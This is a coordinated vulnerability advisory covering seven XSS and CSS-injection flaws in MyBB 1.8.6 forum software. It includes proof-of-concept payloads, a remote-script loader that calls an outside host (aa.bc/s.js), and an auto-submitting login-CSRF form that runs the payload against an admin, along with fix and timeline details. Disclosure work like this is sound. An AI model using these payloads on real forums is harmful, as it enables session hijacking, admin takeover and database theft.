MyBB 1.8.6 Cross Site Scripting

`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: MyBB 1.8.6  
Fixed in: 1.8.7  
Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip  
Vendor Website: http://www.mybb.com/  
Vulnerability Type: XSS  
Remote Exploitable: Yes  
Reported to vendor: 01/29/2016  
Disclosed to public: 09/15/2016  
Release mode: Coordinated Release  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Overview  
  
MyBB is forum software written in PHP. In version 1.8.6, it contains various  
XSS vulnerabilities, some of which are reflected and some of which are  
persistent. Some of them depend on custom forum or server settings.  
  
These issues may lead to the injection of JavaScript keyloggers, injection of  
content such as ads, or the bypassing of CSRF protection, which would for  
example allow the creation of a new admin user.  
  
3. Details  
  
XSS 1: Persistent XSS - Signature  
  
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N  
  
Description: The profile editor of the moderator control panel does not  
properly encode the signature of a user when editing it. Because of this, a  
user can create a specifically crafted signature and - once a moderator or  
admin visits the profile editor for that user - the injected code will be  
executed in the context of the victims browser.  
  
Proof of Concept:  
  
Visit the profile at: http://localhost/mybb_1806/Upload/modcp.php?action=  
editprofile&uid=[USER_ID] As signature, use: </textarea><img src=no onerror=  
alert(1)>  
  
XSS 2: Persistent XSS - Forum Post (depending on forum settings)  
  
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N  
  
Description: An admin can allow HTML input for specific forums via the setting  
allowhtml. There are various filters in place which intend to make this safe,  
which may leave the admin with the impression that it is indeed safe. However,  
there are various possibilities to bypass these filters, mainly using HTML5  
features.  
  
Proof of Concept:  
  
<body onpageshow=alert(1)> -> Visiting the post will trigger the code <div  
contextmenu="mymenu" oncontextmenu=alert(1)>context menu</pre> -> A right-click  
will trigger the code <form action=""> Enter something: <input type="text" name  
="myinput" oninput="alert(1)"><br> <input type="submit" value="Submit"> </form>  
-> Input into the field will trigger the code <form action=""> <input type=  
"text" name="myinput" oninvalid="alert(1)" required> <input type="submit" value  
="Submit"> </form> -> A click on submit will trigger the code  
  
There are various other attributes which may also work, such as onsearch,  
onkeydown, onkeyup, ondrag, onscroll, oncopy, and so on. Other attributes such  
as onMouseOver or onFocus are filtered out.  
  
XSS 3: Persistent XSS - Username (depending on forum settings)  
  
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N  
  
Description: The username is echoed unencoded in the user area. As the login  
does not have CSRF protection and as an admin can be logged into the admin area  
with a different account than the one they are logged into the forum, a  
persistent XSS vulnerability in the user area can be exploited. However,  
successful exploitation most likely requires a username length of at least 43  
characters, which is more than the default settings allow.  
  
Simple Proof of Concept:  
  
1. register user with name f" onmouseover="alert(1)" b=" 2. login and visit  
http://localhost/mybb_1805/Upload/usercp.php 3. hover over the avatar  
  
The simple proof of concept can be improved to allow successful exploitation.  
It is not required for the victim to hover over the avatar or interact with the  
webpage in any way:  
  
1. As username, use: f" onerror="alert(1)" b=" 2. Set an avatar, and use a URL  
as source (not an image upload) 3. Delete the image from the remote host,  
making it unavailable, thus triggering an error and executing the injected  
code.  
  
Possible Payloads:  
  
Loading a script with vanilla javascript takes a lot more characters than are  
allowed in a username by default:  
  
"onerror="s=document.createElement('script');s.src='http://localhost/s.js';  
document.getElementById('top').appendChild(s)"  
  
As jQuery is loaded, this can be optimized:  
  
"onerror="$.getScript('http://aa.bc/s.js')  
  
Executing the payload for a victim:  
  
The attack does not require the victim to not be logged in as normal user, as  
one can login even when already logged in. The login as a normal user also does  
not affect the login as admin. Thus, an attacker could use the following  
payload to log a victim in and redirect them to the site containing the  
payload:  
  
<iframe id="myframe" style="display: none" name="myframe" src="about:blank"></  
iframe> <form method="post" action="http://localhost/mybb_1805/Upload/  
member.php" target="myframe" id="myform" name="myform"> <input name="action"  
type="hidden" value="do_login" /> <input name="url" type="hidden" value="http:/  
/localhost/mybb_1805/Upload/usercp.php" /> <input name="quick_login" type=  
"hidden" value="1" /> <input name="quick_username" type="hidden" value=  
""onerror="$.getScript('http://localhost/s.js')" /> <input name=  
"quick_password" type="hidden" value="123456" /> <input name="quick_remember"  
type="hidden" value="yes" /> </form> <script>document.myform.submit();</script>  
  
It will automatically log the victim in and redirect them to the page that  
triggers the script execution. No action of the victim is required. The loaded  
script could for example perform a backup of the database and then send the  
attacker the name of the backup, as backups are stored in a public directory.  
  
XSS 4: Persistent XSS - Post Attachment (depending on server settings)  
  
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N  
  
Description: Attachments are uploaded to a public directory, and their  
extension is changed to .attach. Files with extension .attach that contain HTML  
code are interpreted as HTML files by some default server configurations (for  
example Apache). Additionally, the directory where the files are uploaded to  
does not prevent directory listing via an index.html file as all the other  
directories of MyBB do. Because of this, an attacker can find the name of the  
file and send it to a victim. Once the victim visits the link, the JavaScript  
code in the file would execute.  
  
Proof of Concept:  
  
1. upload HTML file containing <html><body><script>alert(1);</script></body></  
html> 2. find file located at /mybb_1805/Upload/uploads/YYYMM/  
RANDOM_STRING.attach. The YYYMM directory is not protected against directory  
browsing via an index.php or index.html file like most other directories of  
MyBB, which means depending on the server configuration, the file can easily be  
found 3. send admin there  
  
XSS 5: Reflected XSS - Account Activation  
  
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N  
  
Description: The account activation form echoes a given code unencoded to the  
user, resulting in reflected XSS.  
  
Proof of Concept:  
  
http://localhost/mybb_1806/Upload/member.php?action=activate&uid=-1&code=">  
<script>alert(1)<%2fscript>  
  
XSS 6: Reflected XSS - Update (depending on locked state)  
  
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N  
  
Description: In many of the update scripts, POST values are echoed without  
proper encoding. The scripts are upgrade3.php, upgrade12.php, upgrade13.php,  
upgrade17.php, and upgrade30.php. As this attack only works when the forum is  
disabled, the forum itself cannot be attacked, but the attack could be used to  
attack other software hosted on the same domain.  
  
Proof of Concept:  
  
<form id="myForm" action="http://localhost/mybb_1805/Upload/install/  
upgrade.php" method="POST"> <input name="action" value="30_dbchanges_ip">  
<input name="iptask" value="5"> <input name="iptable" value="7"> <input name=  
"ipstart" value="<script>alert(1)</script>"> <input type="submit" value=  
"Submit"> </form> <script> document.getElementById("myForm").submit(); </  
script>  
  
XSS 7: Reflected CSS Injection  
  
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N  
  
Description: When displaying an error, MyBB echoes user input in a style  
context, allowing an attacker to inject CSS. With this, it may be possible to  
change the look of the website or extract information, and it may lead to XSS  
in older browsers.  
  
Proof of Concept:  
  
This script submits a search, which will trigger an SQL error because of the  
non-existing author. All it does then is change the background color of the  
error report to black to show the existence of the injection:  
  
<form id="myForm" action="http://localhost/mybb_1805/Upload/search.php/) ; }  
%23error { background: %23000000; } /*" method="POST"> <input name="action"  
value="do_search"> <input name="author" value="nonexistentauthor"> <input name=  
"matchusername" value="1"> </form> <script> document.getElementById  
("myForm").submit(); </script>  
  
4. Solution  
  
To mitigate this issue please upgrade at least to version 1.8.7:  
  
http://resources.mybb.com/downloads/mybb_1807.zip  
  
Please note that a newer version might already be available.  
  
5. Report Timeline  
  
01/29/2016 Informed Vendor about Issue  
02/26/2016 Vendor requests more time  
03/11/2016 Vendor releases fix  
09/15/2016 Disclosed to public  
  
  
Blog Reference:  
https://www.curesec.com/blog/article/blog/MyBB-186-XSS-160.html  
  
--  
blog: https://www.curesec.com/blog  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Josef-Orlopp-StraAe 54  
10365 Berlin, Germany  
  
  
`